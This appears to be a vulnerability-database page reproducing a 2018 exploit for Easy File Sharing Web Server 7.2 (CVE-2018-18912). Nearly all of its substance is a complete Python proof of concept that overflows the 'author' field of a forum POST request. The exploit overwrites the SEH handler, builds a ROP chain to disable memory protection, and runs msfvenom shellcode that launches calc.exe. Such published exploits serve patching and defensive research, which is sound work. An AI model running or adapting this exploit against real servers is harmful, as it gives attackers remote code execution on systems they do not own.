Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Easy File Sharing Web Server 7.2 - author Remote Buffer Overflow (SEH) Exploit

🗓️ 05 Nov 2018 00:00:00Reported by kristijanType 
zdt
 zdt🔗 0day.today👁 188 Views

Easy File Sharing Web Server 7.2 Remote Buffer Overflow (SEH

Related
Code
ReporterTitlePublishedViews
Family
CVE		CVE-2018-18912
13 May 201919:05
cve
Cvelist		CVE-2018-18912
13 May 201919:05
cvelist
EUVD		EUVD-2018-10622
7 Oct 202500:30
euvd
NVD		CVE-2018-18912
13 May 201920:29
nvd
OSV		CVE-2018-18912
13 May 201920:29
osv
Prion		Stack overflow
13 May 201920:29
prion
RedhatCVE		CVE-2018-18912
22 May 202503:35
redhatcve
# Exploit Title: Easy File Sharing Web Server 7.2 - 'author' Remote Buffer Overflow (SEH)
# Date: November 5, 2018
# Exploit Author: Kristijan Antic
# Vendor Homepage: http://www.sharing-file.com/
# Software Link: http://www.sharing-file.com/efssetup.exe
# Version: 7.2
# Tested on: Windows 10.0.17134 x64
# CVE : CVE-2018-18912


# 1. Proof of Concept

import socket
import struct

HOST = '192.168.184.1'
PORT = 80

def p32(v):
	return struct.pack("<L", v)

def send_malformed_buffer(data):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((HOST, PORT))
	s.send(data)
	s.close()


#msfvenom.bat -p windows/exec cmd=calc.exe -b '\xff\x2c\x00\x7e\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e\x3d\x25\x2b\x26' -v shellcode -f python

shellcode =  ""
shellcode += "\x6a\x31\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
shellcode += "\x13\x90\xaa\xb9\xe4\x83\xeb\xfc\xe2\xf4\x6c\x42"
shellcode += "\x3b\xe4\x90\xaa\xd9\x6d\x75\x9b\x79\x80\x1b\xfa"
shellcode += "\x89\x6f\xc2\xa6\x32\xb6\x84\x21\xcb\xcc\x9f\x1d"
shellcode += "\xf3\xc2\xa1\x55\x15\xd8\xf1\xd6\xbb\xc8\xb0\x6b"
shellcode += "\x76\xe9\x91\x6d\x5b\x16\xc2\xfd\x32\xb6\x80\x21"
shellcode += "\xf3\xd8\x1b\xe6\xa8\x9c\x73\xe2\xb8\x35\xc1\x21"
shellcode += "\xe0\xc4\x91\x79\x32\xad\x88\x49\x83\xad\x1b\x9e"
shellcode += "\x32\xe5\x46\x9b\x46\x48\x51\x65\xb4\xe5\x57\x92"
shellcode += "\x59\x91\x66\xa9\xc4\x1c\xab\xd7\x9d\x91\x74\xf2"
shellcode += "\x32\xbc\xb4\xab\x6a\x82\x1b\xa6\xf2\x6f\xc8\xb6"
shellcode += "\xb8\x37\x1b\xae\x32\xe5\x40\x23\xfd\xc0\xb4\xf1"
shellcode += "\xe2\x85\xc9\xf0\xe8\x1b\x70\xf5\xe6\xbe\x1b\xb8"
shellcode += "\x52\x69\xcd\xc0\xb8\x69\x15\x18\xb9\xe4\x90\xfa"
shellcode += "\xd1\xd5\x1b\xc5\x3e\x1b\x45\x11\x49\x51\x32\xfc"
shellcode += "\xd1\x42\x05\x17\x24\x1b\x45\x96\xbf\x98\x9a\x2a"
shellcode += "\x42\x04\xe5\xaf\x02\xa3\x83\xd8\xd6\x8e\x90\xf9"
shellcode += "\x46\x31\xf3\xcb\xd5\x87\xbe\xcf\xc1\x81\x90\xaa"
shellcode += "\xb9\xe4"


# ---====GADGETS====---
ropnop = 0x1001a858
pop_eax_retn = 0x10015442
stack_pivot_addr = 0x10022869
pop_esi_retn = 0x1001c8e4
pop_ebx_retn = 0x10012F3C
pop_ecx_retn = 0x1001FC4C
neg_eax_retn = 0x100231cd
add_ebx_eax = 0x1001DA09 
pop_edi_retn = 0x1001A648
xor_edx_edx = 0x10022C4C
inc_edx = 0x61c059a0
pop_ebp_retn = 0x1001add7
push_esp_retn = 0x61c24169
pushad_retn = 0x100240c2


ropchain = ''

buff = 'A' * 64
buff += 'BBBB' #nseh
buff += struct.pack("<L", stack_pivot_addr) #handler
buff += 'F' * 2348

ropchain += p32(pop_eax_retn)
ropchain += p32(0x61c832d0) #need to deref
ropchain += p32(0x1002248c) # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
ropchain += p32(0x61c18d81)
ropchain += p32(0x1001d626)
ropchain += p32(0x10021a3e)

#EBP = ReturnTo() rop gadget to push esp ret
ropchain += p32(pop_ebp_retn)
ropchain += p32(push_esp_retn)

#EDX = NewProtect(0x40)
ropchain += p32(xor_edx_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)
ropchain += p32(inc_edx)

#ECX = lpOldProtect (ptr to writable address address)
ropchain += p32(pop_ecx_retn)
ropchain += p32(0x61c730ad)

#EBX = dwSize()
ropchain += p32(pop_eax_retn)
ropchain += p32(0xFFFFFFFE)
ropchain += p32(neg_eax_retn)
ropchain += p32(add_ebx_eax)

#EDI = ROP NOP
ropchain += p32(pop_edi_retn)
ropchain += p32(ropnop)

#EAX = NOP (0x90909090)
ropchain += p32(pop_eax_retn)
ropchain += p32(0x10027010) #will inc one byte at this addr
ropchain += p32(pop_eax_retn)
ropchain += p32(0x90909090)

#PUSAH
ropchain += p32(pushad_retn)
ropchain += '\x90' * 4
ropchain += shellcode

buff += ropchain

request = ''
request += "POST /forum.ghp?forumid=1 HTTP/1.1\r\n"
request += "Host: 192.168.184.1\r\n"
request += "Content-Type: application/x-www-form-urlencoded\r\n"
request += "User-Agent: Mozilla/5.0\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\r\n"
request += "Accept-Language: en-US,en;q=0.9\r\n"
request += "Cookie: UserID=hacker; PassWD=hacker; frmUserName=; frmUserPass=; rememberPass=202%2C197%2C208%2C215%2C201; SESSIONID=14677\r\n"
request += "Connection: close\r\n"
request += "\r\n"
request += "author="+buff+"&passwd=hacker&title=bbbb&content=ffff&Submit=Submit\r\n"

send_malformed_buffer(request)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
05 Nov 2018 00:00Current
0.6Low risk
Vulners AI Score0.6
CVSS 27.5
CVSS 39.8
EPSS0.02868
exploitremotebuffer overfloweasy file sharingweb serversehwindows 10cve-2018-18912proof of conceptvendor homepagesoftware linkversiontested onexploit authordate
188